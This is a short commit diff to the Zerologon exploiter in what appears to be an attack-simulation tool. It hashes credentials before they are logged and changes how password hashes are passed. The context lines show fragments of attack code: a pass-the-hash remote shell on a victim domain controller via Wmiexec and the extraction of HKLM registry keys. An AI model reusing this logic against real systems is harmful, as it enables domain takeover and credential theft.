Encrypt credentials before logging

2021-02-24 16:08:36 +05:30 · 2021-02-24 16:08:36 +05:30 · 28edf7d2b7
parent 353e9844dc
commit 28edf7d2b7
1 changed files with 10 additions and 7 deletions
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter):
                ]
                try:
                    original_pwd_nthash = self.get_original_pwd_nthash(
-                        username, ":".join(user_pwd_hashes)
+                        username, user_pwd_hashes
                    )
                    if original_pwd_nthash:
                        break
                except Exception as e:
                    LOG.info(
-                        f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}'
+                        f"Credentials didn\'t work. Exception: {str(e)}"
                    )

            if not original_pwd_nthash:
@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter):
        if nthash not in self._config.exploit_ntlm_hash_list:
            self._config.exploit_ntlm_hash_list.append(nthash)

-    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str:
+    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
        if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
            return

@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter):
        finally:
            self.remove_locally_saved_HKLM_keys()

-    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool:
-        LOG.debug(
-            f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". '
+    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
+        LOG.info(
+            f'Starting remote shell on victim with credentials:\n'
+            f'user: {username}\n'
+            f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : '
+            f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}'
        )

        wmiexec = Wmiexec(
-            ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip
+            ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip
        )

        remote_shell = wmiexec.get_remote_shell()